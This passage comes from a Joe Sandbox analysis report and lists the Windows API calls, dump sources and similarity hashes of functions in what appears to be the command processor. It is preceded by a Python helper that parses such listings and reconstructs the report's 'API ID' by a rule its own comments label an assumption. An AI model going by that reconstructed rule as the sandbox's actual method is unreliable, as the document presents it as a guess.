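• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00EEB952), ref: 00EEE2D9
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(774B0000,SetThreadUILanguage,00000000,00EEB952), ref: 00EEE2F9
• SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00EEB952), ref: 00EFDC08
"""
CONSOLE_FUNC = """
• GetConsoleTitleW.KERNELBASE(?,00000104,55099697,00000001,?), ref: 00EEADB6
  • Part of subcall function 00EF5A2E: memset.MSVCRT ref: 00EF5A5A
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• towupper.MSVCRT ref: 00EEB0E3
  • Part of subcall function 00EEE950: memset.MSVCRT ref: 00EEE9A0
  • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEE9FC
  • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEEA14
  • Part of subcall function 00EEE950: _wcsicmp.MSVCRT ref: 00EEEA80
• wcschr.MSVCRT ref: 00EEAED2
• wcsncmp.MSVCRT ref: 00EEB016
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00EFCC6C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00EFCCCB
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str                # address of the call site
    subcall: Optional[str]  # callee address when reported as "Part of subcall function"


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn one function's 'APIs' bullets into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return calls


def resolved_imports(calls: List[ApiCall]) -> List[Tuple[Optional[str], str, str]]:
    """Pair each GetProcAddress with the most recent GetModuleHandle*/LoadLibrary* module argument.
    Returns (module, procedure, call-site) triples; argument order is as logged: (hModule, lpProcName, ...)."""
    out, last_module = [], None
    for c in calls:
        if c.api.startswith(("GetModuleHandle", "LoadLibrary")) and c.args:
            last_module = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            out.append((last_module, c.args[1], c.ref))
    return out


def api_id(calls: List[ApiCall]) -> str:
    """Reconstruct the report's 'API ID' (assumed rule, see comment at top): words of every API name,
    subcalls and GetProcAddress targets included, minus Get/Set and all-caps tokens (W, UI, CP),
    grouped by descending count, each group in code-point order, groups joined with '$'."""
    names = [c.api for c in calls] + [proc for _, proc, _ in resolved_imports(calls)]
    counts = Counter(w for n in names for w in WORD.findall(n)
                     if w not in ("Get", "Set") and not w.isupper())
    groups = {}
    for w, k in counts.items():
        groups.setdefault(k, []).append(w)
    return "$".join("".join(sorted(groups[k])) for k in sorted(groups, reverse=True))


if __name__ == "__main__":
    for name, listing in (("loader", LOADER_FUNC), ("console", CONSOLE_FUNC)):
        calls = parse_api_listing(listing)
        print(name, len(calls), "calls; resolved imports:", resolved_imports(calls))
        print("  API ID:", api_id(calls))
```

Run it against any other function's listing copied from the report to get the same grouping the Similarity field shows; if a listing's API ID does not reproduce, the rule above is incomplete for that case, which is exactly what the assumption label is for. The resolved-import triples are the useful hunting output: they name the exports a sample looks up at run time that never appear in its import table.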

Control-flow Graph
(rendered as an image in the original report) Entry block ef1f1a calls GetConsoleOutputCP and GetCPInfo; block ef1f39 calls memset; block eff185 calls GetThreadLocale; block eff1ee calls memset.
APIs
• GetConsoleOutputCP.KERNELBASE(00EF0A41), ref: 00EF1F1A
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EF1F2B
• memset.MSVCRT ref: 00EF1F45
• GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00EFF185
• memset.MSVCRT ref: 00EFF1FB
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$ConsoleInfoLocaleOutputThread
• String ID:
• API String ID: 1263632223-0
• Opcode ID: 481e393c15dca1fb9cd99ae249962db566c5c9b69ba862a0d02fa6061b5b67ac
• Instruction ID: 2dcfcb17d899337e36d1001a3c7ec274269d347f227fd0926f07783088b9ff4d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481e393c15dca1fb9cd99ae249962db566c5c9b69ba862a0d02fa6061b5b67ac
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB11AFB1A4931FD9D7385F24DC067F53E94AF00304F846176E6C271062D7784482B7DA

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 884 eee3f0-eee403 885 eee45d 884->885 886 eee405-eee41d call ef6e25 884->886 888 eee45f-eee463 885->888 889 eee422-eee427 886->889 890 eee42d-eee43b 889->890 891 efdc4a-efdc66 call f034d4 889->891 892 efdc6b-efdc72 ??_V@YAXPAX@Z 890->892 893 eee441-eee44f 890->893 891->888 896 eee466-eee468 893->896 897 eee451-eee45a memset 893->897 896->897 897->885
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00EE5F21,-00000001), ref: 00EFDC6C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: !_$onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-357547154
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: addab524dd103182d384636c225f1bffeb6d088334ab688c278e557cb332f399
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6a0d196a0aa9afd5c2b56ad8f6c26d1de633ef5f91c31b224ef7506bf3df92e3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: addab524dd103182d384636c225f1bffeb6d088334ab688c278e557cb332f399
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8014CB270474CA7D7289626DC0AB77B6DACBC0310F10552EF96AF73C1DAB6EC408261
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _callnewh.MSVCRT ref: 00EF7437
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF74D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(00EF77EC,00000001), ref: 00EF74E7
                                                                                                                                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00EF7444
                                                                                                                                                                                                                                                                                                                                                      • _CxxThrowException.MSVCRT(?,00F0CBF8), ref: 00EF77F5
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 813871643-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: da80e2804db4aa2d87eca9c5b8c47e7029d8f5d837447e9a175fd30ed0a901e9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ac33b2c72d048eeaa4f0d4c88491d9bef6018aef3a78bcc146d7bb92849a646a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da80e2804db4aa2d87eca9c5b8c47e7029d8f5d837447e9a175fd30ed0a901e9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E0D83550810D77CF107B65EC098BE7F6D4B803207149060BFA9F6491DF30D942E5D1
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE5EFB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF0060: wcschr.MSVCRT ref: 00EF006C
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE5FF7
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4234405029-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e122f37585c286d6221e48a914f7e0462016d48248a1f24c223d66c03b72db5e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 168b9b414abc969d8612cdf9e1518a9cf87322fe3f33f7519febc7fc601413e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e122f37585c286d6221e48a914f7e0462016d48248a1f24c223d66c03b72db5e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31A1E3716083898BD728DB21C84967FB7E5EFC0348F14982DE98AE3291EB34C841DB52

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset
• String ID: COMSPEC
• API String ID: 2221118986-1631433037
• Opcode ID: 93dfa3f02bf5ba28550a87f4995c702b80903100e6d5cdb1b277a4f468bc6605
• Instruction ID: cf0a8f3ac87f99a910125d8a782244f90201a2d44ca752fd016b510be9c156f2
• Opcode Fuzzy Hash: 93dfa3f02bf5ba28550a87f4995c702b80903100e6d5cdb1b277a4f468bc6605
• Instruction Fuzzy Hash: CF4124707046CD8BCB34AB2B994577A72C69B9070CF14386AE915B73D5FB60EC48C293

APIs
• __EH_prolog3_catch.LIBCMT ref: 00EF6E37
  • Part of subcall function 00EF742D: malloc.MSVCRT ref: 00EF7444
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: H_prolog3_catchmalloc
• String ID:
• API String ID: 125873668-0
• Opcode ID: e0ade00145c95c42de3bdcd8568539bf119a8020e5acdf8daf48a5518db36494
• Instruction ID: 4383485358a1cfca050974e446e04a41658c85190faed5b21c466170b19fec73
• Opcode Fuzzy Hash: e0ade00145c95c42de3bdcd8568539bf119a8020e5acdf8daf48a5518db36494
• Instruction Fuzzy Hash: BFC08C6622810CD6FB403790E00377C2A90AB40B02F90B014B38439091DE704A14AA61

APIs
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 5f8fb2f5729966e5f29c7f5674799093a3c99919dc517806ce8ae02962223857
• Instruction ID: 6ca8329840f8e35e179ddaef815aad803041a137e900bfaa1f6f88aa1cf335cb
• Opcode Fuzzy Hash: 5f8fb2f5729966e5f29c7f5674799093a3c99919dc517806ce8ae02962223857
• Instruction Fuzzy Hash: 6BE0267770A6292BE22C18A96C87F378B9DCBC0B70F29103AF704AA180E9A14D0002A4

APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 00F041B9
• _get_osfhandle.MSVCRT ref: 00F041CA
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00F04205
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F0426C
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00F09E02,?,00000010), ref: 00F04283
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F04292
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F042B1
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F042C4
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F042D2
• RtlFreeHeap.NTDLL ref: 00F042D9
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F0432F
• RtlFreeHeap.NTDLL ref: 00F04336
• _wcsnicmp.MSVCRT ref: 00F043DB
• _wcsnicmp.MSVCRT ref: 00F043F0
• _wcsnicmp.MSVCRT ref: 00F04405
• _wcsnicmp.MSVCRT ref: 00F0441A
• _wcsnicmp.MSVCRT ref: 00F0442F
• _wcsnicmp.MSVCRT ref: 00F04444
• _wcsnicmp.MSVCRT ref: 00F04459
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00F044A5
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00F044F0
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00F04506
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 00F0451D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F04565
• RtlFreeHeap.NTDLL ref: 00F0456C
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00F04595
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F0459C
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F045C3
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00F09E02,?,00000000), ref: 00F045D4
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F045DD
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2991647268-3100821235
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 31e2e29144f596d08be85bf3d37c572b54aa16fdfe1ba6389a7f4604c9e0229e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 269f741bc33cde08a633c6de605ef8a7ded491522eac62629681e2755247657d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31e2e29144f596d08be85bf3d37c572b54aa16fdfe1ba6389a7f4604c9e0229e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC1BEB0A04305ABC720DF64DC49A2ABBE5FF88724F04892CFA56D22E0D775D945FB52
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID:
• String ID: [...]$ [..]$ [.]$...$:
• API String ID: 0-1980097535
• Opcode ID: 6c79197ad85b7c19bdb134875e64830c14191bc3ac922a0dea0b4e0833bede99
• Instruction ID: bd6b5f7e9f98c36937201c016f371fddb58450c83f6c0613946f89d546118785
• Opcode Fuzzy Hash: 6c79197ad85b7c19bdb134875e64830c14191bc3ac922a0dea0b4e0833bede99
• Instruction Fuzzy Hash: 8612C1B03083499BD724DB25C985ABFB7E9EF88344F00592DF689E7291EB34D845CB52
APIs
• GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00F0E590,?,00002000), ref: 00EE6896
• SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE68AA
• FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00EE68BE
• FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE68D2
• realloc.MSVCRT ref: 00EFA5E7
  • Part of subcall function 00EE8791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00EE6906,0000001F,?,00000080), ref: 00EE8791
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00EE6907
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00EE698F
• memmove.MSVCRT(?,?,?), ref: 00EE6A86
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00EE6AAF
• realloc.MSVCRT ref: 00EE6ACA
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00EE6AFE
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
• String ID: %02d%s%02d%s%02d$%s $%s %s
• API String ID: 2927284792-4023967598
• Opcode ID: 590d1601992e950f5be8f390aa6433afc81c41e588e4934d8801f46f0d458264
• Instruction ID: 2534a1b326f687a7d9d0379ddc9c5389288e38ab85487e43a2d848c976f36766
• Opcode Fuzzy Hash: 590d1601992e950f5be8f390aa6433afc81c41e588e4934d8801f46f0d458264
• Instruction Fuzzy Hash: DFC1D6B190025D9BCB24DF619C45AFA73B8EF84304F1490B9E90DFB251EA319E85DB61
APIs
• memset.MSVCRT ref: 00EF4F03
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00EF4F67
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00EF4F77
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00EE2670,?,?,?,-00000001), ref: 00EF4FEB
• FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00EF5103
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00EF511E
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00EF5141
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstmemset$Next
                                                                                                                                                                                                                                                                                                                                                      • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3059144641-4282027825
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6172d391563b4320ed70e90d6ae868dd598e9ff89063582c101341bb84323b13
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e0dc57735dde5002b3a90e4e0403b737df3536833660681b50bba50229cd359b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6172d391563b4320ed70e90d6ae868dd598e9ff89063582c101341bb84323b13
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCE1D472A0050D9BDB24DB64CC85BFA73B9EF64314F4414A9EB09F7181EB31AE85EB50
APIs
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 00EE539C
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: AttributesFile
• String ID: )W$)W
• API String ID: 3188754299-341896779
• Opcode ID: 3a72f03d0cb6879d893edea50ef486c4cba4b4037ebbbfb1845dd4082ec31f61
• Instruction ID: 88517295caf5ffad0be8314ec77045124bfc8b855fe9544dc13d3c84fdc903a3
